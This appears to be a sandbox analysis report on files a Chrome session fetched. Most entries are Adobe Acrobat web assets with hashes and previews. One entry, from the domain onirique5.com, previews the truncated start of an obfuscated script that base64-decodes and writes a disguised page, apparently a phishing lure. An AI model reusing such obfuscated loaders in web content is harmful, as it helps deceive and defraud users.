                                                      Preview:/* For license information please see https://prod.adobeccstatic.com/License/LICENSE.txt */."use strict";(self.webpackChunkuniversal_nav=self.webpackChunkuniversal_nav||[]).push([["svg-icons"],{546:(C,t,h)=>{h.r(t),h.d(t,{default:()=>n});const n={"app-switcher":'<svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 20 20">\n <path d="M4.75 2.25H3.25C2.69772 2.25 2.25 2.69772 2.25 3.25V4.75C2.25 5.30228 2.69772 5.75 3.25 5.75H4.75C5.30228 5.75 5.75 5.30228 5.75 4.75V3.25C5.75 2.69772 5.30228 2.25 4.75 2.25Z"/>\n <path d="M10.75 2.25H9.25C8.69772 2.25 8.25 2.69772 8.25 3.25V4.75C8.25 5.30228 8.69772 5.75 9.25 5.75H10.75C11.3023 5.75 11.75 5.30228 11.75 4.75V3.25C11.75 2.69772 11.3023 2.25 10.75 2.25Z"/>\n <path d="M16.75 2.25H15.25C14.6977 2.25 14.25 2.69772 14.25 3.25V4.75C14.25 5.30228 14.6977 5.75 15.25 5.75H16.75C17.3023 5.75 17.75 5.30228 17.75 4.75V3.25C17.75 2.69772 17.3023 2.25 16.75 2.25Z"/>\n <path d="M4.75 8.25H3.25C2.69772 8.25 2.25 8.69772 2
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (49205), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):49256
                                                      Entropy (8bit):4.837441256819152
                                                      Encrypted:false
                                                      SSDEEP:768:qbgUPdFtpz7sqjAsSvRk4wAweAsWmO1uKdM:3UH0ikncM
                                                      MD5:52EFE31E82806FA2579EA588B1269047
                                                      SHA1:88B765152693E403C1173CD0497347F2A568C70E
                                                      SHA-256:DECC7E5756F1129A36DAA5EF82BD7A8284518D399E59CCFEA6532AA4528958A3
                                                      SHA-512:3613981A07B5C96CD45BD3DA4051606ED78FF0294A8710D1170A9AC3775CF8D30E289FA0EB05B9460CFC3D786DB14D4C868278901DD0715C3310A67349B7E6D9
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dcpreviewdropin/3.46.1_2.1133.0/translations-en-US-json-chunk.js
                                                      Preview:"use strict";(self["webpackJsonp-preview"]=self["webpackJsonp-preview"]||[]).push([[7818],{t39f:e=>{e.exports=JSON.parse('{"default":" ","file.downloading":"Loading...","contextMenu.textSelection":"Copy Text","contextMenu.textSelectionEureka":"Copy text","contextMenu.openLinkNewWindow":"Open Link","contextMenu.copyLink":"Copy Link","contextMenu.downloadAttachment":"Download Attachment","contextMenu.downloadDocument":"Download Document","contextMenu.addNote":"Add sticky note","contextMenu.addFreeform":"Use drawing tool","contextMenu.downloadPdf":"Download PDF","contextMenu.printPdf":"Print PDF","contextMenu.legalNotes":"Legal Notices","contextMenu.resetFields":"Reset Fields","contextMenu.paste":"Paste","contextMenu.modernViewer.copyText":"Copy text","contextMenu.modernViewer.copyLink":"Copy link","contextMenu.modernViewer.openLink":"Open link","find.placeholder":"Find text in document","find.placeholderOld":"Find in document","find.progress":"Searching {pageBeingSearched, number} of {pa
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:GIF image data, version 89a, 1 x 1
                                                      Category:dropped
                                                      Size (bytes):35
                                                      Entropy (8bit):2.9302005337813077
                                                      Encrypted:false
                                                      SSDEEP:3:CUHaaatrllH5:aB
                                                      MD5:81144D75B3E69E9AA2FA3E9D83A64D03
                                                      SHA1:F0FBC60B50EDF5B2A0B76E0AA0537B76BF346FFC
                                                      SHA-256:9B9265C69A5CC295D1AB0D04E0273B3677DB1A6216CE2CCF4EFC8C277ED84B39
                                                      SHA-512:2D073E10AE40FDE434EB31CBEDD581A35CD763E51FB7048B88CAA5F949B1E6105E37A228C235BC8976E8DB58ED22149CFCCF83B40CE93A28390566A28975744A
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:GIF89a.............,..............;
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65469)
                                                      Category:downloaded
                                                      Size (bytes):330605
                                                      Entropy (8bit):5.7751210008559895
                                                      Encrypted:false
                                                      SSDEEP:6144:X31TsJLEDr8Q67E9gybT4jlwEJJh101bzsegPw8e+e1Ensi6vlF5SQ0MN:X3f8y1bzsegPw8Sr93t
                                                      MD5:7161E533A43B9E8E380AE51E5C544B57
                                                      SHA1:FF8C99B2A761C21EE84B2CC64D174B0FF9ABAD12
                                                      SHA-256:0F4282B744BCC198E87117F67D35BDD2525CA5C70C207C1E1D95B40225AC5232
                                                      SHA-512:F6C150C69D581142BAFFEBB77B349961CE84050BB7C50B33000642DF967E6CBED3478B84B9D846D620EC797D9BBB9CBB86CCECA5F09F32DC2271FC0ADA0F9F83
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-fillsign2-dropin/3.17.1_1.498.0/bootstrap.js
                                                      Preview:/*! For license information please see bootstrap.js.LICENSE.txt */.(()=>{var i,n,r,a,o={e4dh:(i,n,r)=>{"use strict";n.U=function A4uChevronDown(i){var n=_extends({},i);return a.default.createElement("svg",_extends({viewBox:"0 0 36 36"},n,n),a.default.createElement("path",{fillRule:"evenodd",d:"M8,14.02a2,2,0,0,1,3.411-1.411l6.578,6.572,6.578-6.572a2,2,0,0,1,2.874,2.773l-.049.049L19.4,23.415a2,2,0,0,1-2.825,0h0L8.586,15.432A1.989,1.989,0,0,1,8,14.02Z"}))};var a=function _interopRequireDefault(i){return i&&i.__esModule?i:{default:i}}(r("YWiy"));function _extends(){return _extends=Object.assign?Object.assign.bind():function(i){for(var n=1;n<arguments.length;n++){var r=arguments[n];for(var a in r)Object.prototype.hasOwnProperty.call(r,a)&&(i[a]=r[a])}return i},_extends.apply(this,arguments)}},mLZK:(i,n,r)=>{"use strict";r.d(n,{A:()=>a});const a=function stylis_min(i){function M(i,a,o,l,c){for(var d,w,S,C,x,I=0,O=0,J=0,ie=0,oe=0,se=0,le=S=d=0,ce=0,de=0,ue=0,he=0,ge=o.length,ye=ge-1,ve="",Se
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):571
                                                      Entropy (8bit):4.868341244422001
                                                      Encrypted:false
                                                      SSDEEP:12:BmL+xY4QxpkiTjR5xc1gmPQCBlBy36aY1GVf01iwWArITvFcOYdldY:BmSx8xpTTtmPfa3DjArIbSbdc
                                                      MD5:9BC94F98F08D170FE39A07CFA208AFA3
                                                      SHA1:CC0BB53D6BED23AF4ADC99F236A1C23ED6DE6F57
                                                      SHA-256:A1519D47B6C39AD275663EF973CD9DB7953E0C2E0D78D94330F9DB152A51EA4F
                                                      SHA-512:52034FD99956B4691E0C7EE4E6D8752FF2159D449A27B55F7A2A46E2D8272DA3101E8BEF451F63C900A97347477DDEA746478E8143C4754AE3A51968B84342FB
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:{. "LOC_ALL_APPS": "All apps",. "PROFILE_SIGN_IN": "Sign in",. "PROFILE_SIGN_UP": "Sign up",. "GET_HELP": "Get help",. "CONTACT_US": "Contact us",. "APP_LAUNCHER_TOOLTIP": "App switcher",. "ASK_THE_COMMUNITY": "Ask the community",. "HELP_MENU_TOOLTIP": "Help",. "APP_SWITCHER_HEADER_TITLE": "Web Apps",. "APP_SWITCHER_ERROR": "Unable to load app switcher.",. "HELP_ERROR": "Unable to load help menu.",. "TRY_AGAIN": "Try again",. "LOC_HOME": "Home",. "MY_ADOBE": "My Adobe",. "DISMISS": "Dismiss",. "CART_TOOLTIP": "Cart".}
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (32423)
                                                      Category:downloaded
                                                      Size (bytes):32480
                                                      Entropy (8bit):5.556704842363431
                                                      Encrypted:false
                                                      SSDEEP:768:nSnXjOkMndWZgd2sGITQI0wTh0jaMYR6cF7p:SKvdWs3Vn1
                                                      MD5:478054DF2E24BF8D4DB35E152523AB06
                                                      SHA1:9F581087D8DAACAF38C6A8C0EB105897DB035210
                                                      SHA-256:2978D316E3DF0D25487DAF9559A1108D6E300FB2A8E9285761968AEA8054153A
                                                      SHA-512:0FF59E8EF471CE0204A80A6A5550D0DA2112181CE1ACA976CF57773851BE69C6A1C6D61124696D1F7FC504DAE8831C108845D87BD1EB5BF783D1D9F8D4A4CFF7
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-review-dropin/3.21.0_2.323.0/shareNavAction-chunk.js
                                                      Preview:(self["webpackJsonp-review"]=self["webpackJsonp-review"]||[]).push([[5781],{SrWq:(e,t,n)=>{"use strict";n.r(t),n.d(t,{default:()=>j});var i=n("YWiy"),r=n("/hLX"),a=n.n(r),o=n("Zm2D"),s=n("YKBo"),l=n.n(s),c=n("zFJ/"),p=n.n(c),d=n("yi7a"),h=n("Iacv"),v=n.n(h),A=n("plsW"),u=n("/HUp"),m=n.n(u),_=n("ISYe"),g=n("vDRv"),C=n("qlfv"),S=n("pg+d"),f=n("NbL4"),b=n("Lx6e"),I=n.n(b),w=n("Avuh"),k=n.n(w),y=n("xpph"),D=n.n(y),B=n("Lq19"),E=n.n(B),P=n("+t5G"),N=n("VjBA"),x=n("jUaj"),L=n("lHjK"),O=n("aUgD"),F=n.n(O);const M=(0,N.observer)((e=>{var t,n;const{popoverClass:r,inviteIconStyle:a,shareInviteTooltip:o,isInvitePopoverOpen:s,onSendInviteOverlayBtnClick:c,disable:d,profilePics:h,addAccessRequesterProfilePic:A,getAvatarList:u,SendComponent:_,fetchParticipantInfo:g,onSendInviteOverlayHide:C,beforeShare:f,afterShare:b,afterShareFailure:w,isFileProtected:y,isCommentingAllowed:B,shouldEnableModernViewerInMobile:N,showPendingAccessRequests:O,isOwner:M,signedInUserAddedAsCollaborator:T,timePopoverMessage
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:GIF image data, version 89a, 300 x 300
                                                      Category:downloaded
                                                      Size (bytes):323013
                                                      Entropy (8bit):7.984801284225148
                                                      Encrypted:false
                                                      SSDEEP:6144:mcGckxWKJPX4oicm5ZrURGR0KToGa6jR+tu/+TcQ7dzqzeYwy7TOlv:mNvWKJv4oicE4PBGaYR+tI+TrIUy7TOp
                                                      MD5:4DA65C6988352CE0219E8070A4B9844C
                                                      SHA1:BDC28D0C6BEDCDB7673F193192F2779B4055B4DC
                                                      SHA-256:9A3D244E9F4900719FCCE221D5762019F2DE27A8C928AD6583EEBA7B05A655DC
                                                      SHA-512:E5C444384BDF7BD2A0532973C587AC22B9CF2DBF83184F74E24264B51B097B4B793BD9D207E79BB07E28E688263F8FF0937D2826932426464A89AE5D332830DD
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-comments-dropin/3.59.4_2.1089.0/bd7c846d5d6adfeedd6d1ec2b254b0c0.gif
                                                      Preview:GIF89a,.,.............f..3...........!..NETSCAPE2.0.....!.......,....,.,....h...0.I..8...`(.di.h..l.p,.tm.x..|....pH,...r.l:..tJ.Z..v..z.`jaL.....qn..Z.|....x.t..y.xO}...Sw(oL...N./zF...Jm7.D...E.:.>...Ag..=...=.D.8...9fK.....4..e7...2.P.1...-.Q.-...*.X.)...&.b.+...#.\.'... ..."......c&.........=....$3..?.....h..C..(Nd....E..4.....G..H....A..T....%L.kT.<.3%Kx"w....E..z.(.P!.kJ.".......q`..T!..z.kX.,.....AZ...u..n\.s...d6k^.{..=.4..~..0...V.u...K..d.!G...1.C..v.\ur..+....l....}.X.j.w....i..m.>\.f...>.tn....G....=....jp.../.~..w...'...|..C.w..`y...G.......aB.|..H.i.Y..{59..x.rf`........6.q...E.~.gS..".b.\5..N....&..R.....C2.Ac/'~.\..^.#.%x.d.;.`.......J..x.:.....&D..BYd.Hp9..R..e.bV..4g.....m.&}....A~9..sf.g....Z..p.......6..+@5...-.5..}...Vxz.iB...i.i.....P..a...D..b|.v.j.8.pkO....&.......... ....&...4k..d...J..;`.,....m.2d..x.S.R."..{.Y.-F.......*.|~..Pu.{i......F.k....U-v.D|.T..p...."..G.q.#g;jD!.|..)k..'[<m.&..#.5......<..2..3.h..2.M
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):404778
                                                      Entropy (8bit):5.5049632392868775
                                                      Encrypted:false
                                                      SSDEEP:3072:9ocDF2dCS+k3dSvN13m3lQqg30/2nDZwCXZv9aPuTgHAJ:9oKodCU3dS1ayqg3Yo1DCi
                                                      MD5:99D8541341F027B8E3FB84B0D5DAAB36
                                                      SHA1:3C878CE6FF52CDFD6278796490730AF8307276ED
                                                      SHA-256:4011645F2B67B3596E626AFB1AB7B22C8A7D112C856712CCC7EE5903E5EFDF1D
                                                      SHA-512:35D267C41CAA6C861E40A0358308F85E49C60B4671D7E50A33918F70AADF702D782AF21366AAAA182C148CFBA625E1D3E4C3C00FFCEF62404CA6C615A68D7AC3
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dcpreviewdropin/3.46.1_2.1133.0/7920-chunk.js
                                                      Preview:(self["webpackJsonp-preview"]=self["webpackJsonp-preview"]||[]).push([[7920],{lFrp:(e,t,n)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.ReactBackend=void 0;var i=function(){function defineProperties(e,t){for(var n=0;n<t.length;n++){var i=t[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(e,i.key,i)}}return function(e,t,n){return t&&defineProperties(e.prototype,t),n&&defineProperties(e,n),e}}(),o=n("f/0J"),a=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}}(n("KybH"));var s=t.ReactBackend=function(e){function ReactBackend(){return function _classCallCheck(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,ReactBackend),function _possibleConstructorReturn(e,t){if(!e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!t||"object"!=typeof t&&"function"!=typeof t?e:t}(this,(ReactBackend.__proto__||Object.getPrototypeO
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, ASCII text, with very long lines (65340)
                                                      Category:downloaded
                                                      Size (bytes):191099
                                                      Entropy (8bit):4.673186651894305
                                                      Encrypted:false
                                                      SSDEEP:3072:I9y7tv9mpKMs2xLb9y7tv9mpKMs2xLAVh:IeumsbeumsAVh
                                                      MD5:AF77984566B6C615B403975EBAF41B45
                                                      SHA1:BE632FF3B7BD2775062C8333FB35F71C0A2C21F5
                                                      SHA-256:C09EE96D822887EB82660AC1091EA115CAE02544717F7F3C47432897256EDBF5
                                                      SHA-512:232AFE25CD862F008D77A55A8102EBF6E976C4B72AD1EFE383E39F10F25B1A073775558D69A925422F9223CCB540F8D1E6BECBDEA8D72ED55648AD0E2C96BB0D
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://0q.onirique5.com/xRmONkR9H3tSwgZ6bakdPQM/
                                                      Preview:<script>.eHZjZkFYNd = atob("aHR0cHM6Ly8wcS5vbmlyaXF1ZTUuY29tL3hSbU9Oa1I5SDN0U3dnWjZiYWtkUFFNLw==");.NSbXBuZuKC = atob("bm9tYXRjaA==");.FmudjvmzRa = atob("d3JpdGU=");.if(eHZjZkFYNd == NSbXBuZuKC){.document[FmudjvmzRa](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxsaW5rIHJlbD0iaWNvbiIgaHJlZj0iaHR0cHM6Ly9kZXZlbG9wZXJzLmNsb3VkZmxhcmUuY29tL2Zhdmljb24ucG5nIiB0eXBlPSJpbWFnZS94LWljb24iPgogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPgogICAgPHNjcmlwdD4KICAgIGNvbnN0IGVnTHRneVRGbm8gPSB7CiAgZ2V0KEhPaEdiaW53amQsIGZWbHJSWEtKc2kpIHsKICAgIGNvbnN0IEpOSHRacXpxb1AgPSBbLi4uZlZsclJYS0pzaV0KICAgICAgLm1hcChoTkptWnp0YXdxID0+ICsoJ+++oCcgPiBoTkptWnp0YXdxKSkKICAgICAgLmpvaW4oJycpOwogICAgY29uc3QgQ2t0S0NReWtuVSA9IEpOSHRacXpxb1AucmVwbGFjZSg
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (63882)
                                                      Category:downloaded
                                                      Size (bytes):64002
                                                      Entropy (8bit):5.2982461032960915
                                                      Encrypted:false
                                                      SSDEEP:768:YQA7OzRtWmZ/2Vebdiy23Zz2uDsyANhc7izmac1VBtC1abiXimm2h/hme6AeQI1j:xg7sD5zyiyxrQOwE
                                                      MD5:02CD47FD005D644D78F7950ED91C32AF
                                                      SHA1:997BDC4BB4961708528D59ABFB0034A259079DF7
                                                      SHA-256:5D54D14BC7C6BF3585D41B036E016BBD5CCCE0049794904849DDB81D92578A49
                                                      SHA-512:4F89FFB9D6480EEA71B758EB44960D615328883D03AACFD91F953E85F841CFECAED106030EB1B27C3D995B35622357EC5D232ADE28968658332D5CCB544B5E54
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-comments-dropin/3.59.4_2.1089.0/EmojiPickerComponent-RHComments-expandedPanelContainer-commentDialogContainer-chunk.js
                                                      Preview:(self["webpackJsonp-comments"]=self["webpackJsonp-comments"]||[]).push([[9805],{B59H:(n,e,o)=>{"use strict";o.r(e),o.d(e,{default:()=>a});var t=o("NjQJ"),i=o.n(t),r=o("AXyZ"),l=o.n(r)()(i());l.push([n.id,':root{}.ModernEditableTextComponent__textEditor___b0_UX:focus{color:#4b4b4b;margin:7px 0 3px}.ModernEditableTextComponent__textEditor___b0_UX{height:80%}.ModernEditableTextComponent__textEditor___b0_UX,.ModernEditableTextComponent__textEditorInlineCommenting___gHXtS{align-items:baseline;font-style:normal;font-weight:400;line-height:1.5;margin:7px 0 3px;min-height:30px;outline:0;outline-color:transparent;outline-style:none;outline-width:thin;padding-left:10px;padding-right:10px;-webkit-user-select:text;-moz-user-select:text;user-select:text;white-space:pre-wrap}.ModernEditableTextComponent__textEditorInlineCommenting___gHXtS{cursor:pointer;flex-grow:1}.ModernEditableTextComponent__quickCommentsCTA___g62eF{margin-left:7px;margin-top:3px}.ModernEditableTextComponent__quickCommentsCTA___g
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (16134)
                                                      Category:downloaded
                                                      Size (bytes):16339
                                                      Entropy (8bit):5.286146362832543
                                                      Encrypted:false
                                                      SSDEEP:384:lNxW7gV/JQ+DHbFiq+J7R6nb/IM1PzF02yFgwUlC1na1yvw1y61oEaEXEIEO7fvR:lNxRVRQ+DH5iq+J74nb/IM1PzF0xFgwy
                                                      MD5:43F9A801A91B3B4C00E38EB61B935F53
                                                      SHA1:12E3E1DCED19A10C944377BDF32AEB9726B69905
                                                      SHA-256:4EDBC8A1D60E75633AFC5B5E53DEBCAF27CF6B848FACF508C7EFBB7BC723858B
                                                      SHA-512:2A8029BA37A5821D3AEFE47EC3BB2CBCDFC9533B4BAF567D9C274543779F16A9C3744A81E0B11B8D8FF2E408508A106FF75C5A503FEB6122B510810FD946AC22
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://prod.adobeccstatic.com/unav/1.4/UniversalNavComponentLayout.7bd226a0aa27a4154a91.bundle.js
                                                      Preview:/* For license information please see https://prod.adobeccstatic.com/License/LICENSE.txt */./*! For license information please see UniversalNavComponentLayout.7bd226a0aa27a4154a91.bundle.js.LICENSE.txt */.(self.webpackChunkuniversal_nav=self.webpackChunkuniversal_nav||[]).push([["UniversalNavComponentLayout"],{2:(e,t,n)=>{"use strict";n.r(t),n.d(t,{default:()=>k});var r=n(61),o=n(610),a=n(625),i=n(509),s={"app-switcher":{id:"APP_SWITCHER_ERROR",fallback:"Unable to load app switcher."},help:{id:"HELP_ERROR",fallback:"Unable to load help."}};const c=function(e,t){var n=i.Z.getLocaleStrings(),r=s[e],o=(null==n?void 0:n[r.id])||r.fallback,c=(null==n?void 0:n.TRY_AGAIN)||"Try again",l=(0,a.k)("<div class='unav-comp-error' data-test-id='unav-error'>\n <div class='error-msg'>".concat(o,"</div>\n <div class='error-cta'>").concat(c,"</div>\n </div>"));return l.querySelector(".error-cta").addEventListener("click",(function(e){return t(e)})),l};var l=n(338);var u=4,p=function(e){
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, ASCII text, with very long lines (745), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):745
                                                      Entropy (8bit):4.932467956418764
                                                      Encrypted:false
                                                      SSDEEP:12:qTjxVh2Rc1W6YXu6TieBWsRLWWEf/EicgGbSoW8m0oQWz2GZQ+aNVI:0jHh2KIq4ow2G/WQWz2oaNVI
                                                      MD5:7E839354B85F2E143DB501A2B85E03B6
                                                      SHA1:9DEF67AE2244448935054EC5117ECFD492B77266
                                                      SHA-256:674FED77505A3C0BD12DB8710AC954554558F47916C526F830308FE2B96C37CA
                                                      SHA-512:D6940D520F465EF1CB53E6FC58CF7CED38A8F386E21D4479EDA79082B0EB27E54B9A215C83AE538C1F7C846232C8136FC4481CFA7B16ABB43C04E7D715661F03
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dcpreviewdropin/3.46.1_2.1133.0/printHelper.html
                                                      Preview:<!doctype html><html><head><meta charset="utf-8"/><meta http-equiv="X-UA-Compatible" content="chrome=1"/><meta name="referrer" content="never"/><meta http-equiv="Content-Security-Policy" content="base-uri 'self'; block-all-mixed-content; default-src 'none'; frame-src blob:; object-src blob:;script-src 'self'; style-src 'self'; worker-src 'none';"></head><body><div id="spinner-container"><div class="spinner"><div class="track"></div><div class="fills"><div class="fillMask1"><div class="fillSubMask1"><div class="fill"></div></div></div><div class="fillMask2"><div class="fillSubMask2"><div class="fill"></div></div></div></div></div><p>Preparing the file for print.</p></div><script src="printHelper_main.fe9e0a8b.js"></script></body></html>
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:WebAssembly (wasm) binary module version 0x1 (MVP)
                                                      Category:downloaded
                                                      Size (bytes):9577747
                                                      Entropy (8bit):5.7905918751488645
                                                      Encrypted:false
                                                      SSDEEP:24576:eVGVQG4T5Xqi+VthTr/Rf9j7DtBlmASbFCmAobF6bFLmAlb9Yb9qbFdbFtbF5bFB:eGXbjU8inbKsHq2U
                                                      MD5:F8659BF25DAA21F0FA4042E25308EEF6
                                                      SHA1:6CEA69BC854A52178A665906383E6B4E9BD2AF0C
                                                      SHA-256:69AA19005687FF3505F5A2FCAC6A5FB7B5F3081108DF4D4FFB162E3FC2BFEEA6
                                                      SHA-512:65CB7D00A9D2373864F968E408B4FD3013AFFB79CDFB303426088630492D6770286C27DBD717A0ED11641872CFF8D3E18A98887412C46E85FF031ADA993202EA
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-rendition-provider/AJS/build/wasm_acrobat_we.5c352f16d0b47ea14845f1b29d34fc07.wasm
                                                      Preview:.asm.......dylink.0....H..]......`...`....`....`.....`.....`......`......`.......`.......`........`........`.........`..`.........`..........`..~.`...~`..........`...........`...`...}`..}.`..}..`..}}..`...~...`...........`...}..`....}.`............`..}...`..}...`.}.}`...~.`.}...`..}}}}..`....}`....~..`...}.`..~~~~.`.....}.`............`..~..~`.............`..~..`...~..`..~~..`.....~..`...~..`..............`..|.`...}..`.~...`.............`..}}..`..~.~`.}}.}`..~...`..}}.`......}.`..~...`..}..`...}}..`..}}}}}}..`.~~.~`..|`..|..`..~`...}.}`.|.}`.|..|`.}..`...}}}....`...}...`....~`......}}.`......~..`...............`.}.....`..~~.`......~`.....}`..}}}}}}}}...`...............`.................`..|......`.}..}`....~~..`....|..`.....~~..`.....|..`......~~..`.~..`...|`...|.|`..}}...`...}}}...`....~.~`..}}}}}}.`.~~~~..`..}}}.`..................`.....}..`........}}...`....}}}..`..~..~.`...}}}}}}}}...`....}}}}}}}}.`......}}....`...}}..`..~....`....||.....`.....~..`...}}.`..............}....`..}.}.}
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):154501
                                                      Entropy (8bit):5.277973152267676
                                                      Encrypted:false
                                                      SSDEEP:3072:CLkqNsLW/fTcsQ6IuhJGeBIbOqWGSyEwk2nI2YH1:CkqN3Q6B2eBIbOqWGSyEwk2nIbV
                                                      MD5:4E8FAC9CB5DC68B9C9BB81177C451C6B
                                                      SHA1:A7407DD1048200C735C35CD00EE521D81833BE59
                                                      SHA-256:DC38B0C27AFD2479C8356E68E23339AC2162C20D506F4FE8F6A89B193C63D60D
                                                      SHA-512:010CB30AFC3F2CE65B44B81F28E6F87E1A0499F732B159D559E81770729F6BB9A0760512CF598A0D06DEC21E10D5A0BB4092C252D64903E2A2FCBEE94F8D4BDD
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/home/006ad14344/330-1e38ac8c256ec2a78f96.js
                                                      Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},t=(new e.Error).stack;t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="b28e0daf-a856-4733-acd3-1a0ec9b06891",e._sentryDebugIdIdentifier="sentry-dbid-b28e0daf-a856-4733-acd3-1a0ec9b06891")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"006ad143443732a31b79a885bb25ab6ae1f1d89a"},(self["webpackJsonp-dc-web-app"]=self["webpackJsonp-dc-web-app"]||[]).push([[330],{uwJM:(e,t,n)=>{n.d(t,{Z:()=>getEnvelopeEndpointWithUrlEncodedAuth,k:()=>getReportDialogEndpoint});var r=n("x4ap"),i=n("2hc2");function ownKeys(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}function _defineProperty(e,t,n){retur
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (65463)
                                                      Category:downloaded
                                                      Size (bytes):285657
                                                      Entropy (8bit):5.550890952279943
                                                      Encrypted:false
                                                      SSDEEP:6144:6v548NgXB04T5QDOsUSHYGqhNjsqU7/JwuEpWmo0QbPz3F65aaMVhUTPkXUELcGI:6hTyi3chBGRCFI+
                                                      MD5:A879A732985FEFE2279F5AAC646FEB24
                                                      SHA1:63B41505D476BB8DD900FBBB73233BA711F2CC79
                                                      SHA-256:4724C02DBDBCAE21A8493F37D591442F1E31E918ECA6750C4A8611B18A917F6E
                                                      SHA-512:8F7EDFB7A6E15F23BBB8E9A8A1A8D2F35C47A7B22F3FBE38859C9C12F8360EAE3AE29BB03475B1231A0A76D8C3AD58DDBBE02832509501F9CAE22C2A09498ED3
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-rendition-provider/3.46.1_6.219.0/rendition.js
                                                      Preview:/*! For license information please see rendition.js.LICENSE.txt */.(()=>{var r,f,_={sR8A:r=>{(()=>{var f,_,S={7232:function(r,f,_){var S;!function(R,D){"use strict";var k="function",I="undefined",W="object",ie="string",ne="model",oe="name",le="type",ve="vendor",we="version",be="architecture",Pe="console",Ae="mobile",Se="tablet",Te="smarttv",De="wearable",ke="embedded",Ce="Amazon",Ie="Apple",je="ASUS",Fe="BlackBerry",Ee="Browser",Ne="Chrome",xe="Firefox",Oe="Google",Me="Huawei",Le="LG",Ue="Microsoft",ze="Motorola",qe="Opera",He="Samsung",Ge="Sharp",Je="Sony",Ve="Xiaomi",$e="Zebra",Ke="Facebook",U=function(r){for(var f={},_=0;_<r.length;_++)f[r[_].toUpperCase()]=r[_];return f},z=function(r,f){return typeof r===ie&&-1!==H(f).indexOf(H(r))},H=function(r){return r.toLowerCase()},q=function(r,f){if(typeof r===ie)return r=r.replace(/^\s\s*/,""),typeof f===I?r:r.substring(0,350)},V=function(r,f){for(var _,S,R,I,ie,ne,oe=0;oe<f.length&&!ie;){var le=f[oe],ve=f[oe+1];for(_=S=0;_<le.length&&!ie;)i
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65468)
                                                      Category:downloaded
                                                      Size (bytes):2298888
                                                      Entropy (8bit):5.66077006011023
                                                      Encrypted:false
                                                      SSDEEP:24576:wMp3Bj08cRfbY2RUg3HQ3cAc+6nKWcJbbbP47wn/wwJw9YYDpCC+wxvF2D01gmd4:nBI/Qkwn/JJCZx2D0OZ
                                                      MD5:90DB6D0148B6240C2CA8F748233AECAC
                                                      SHA1:2B17BB3A926DDF5C9C8ABF9917159653A93D54D9
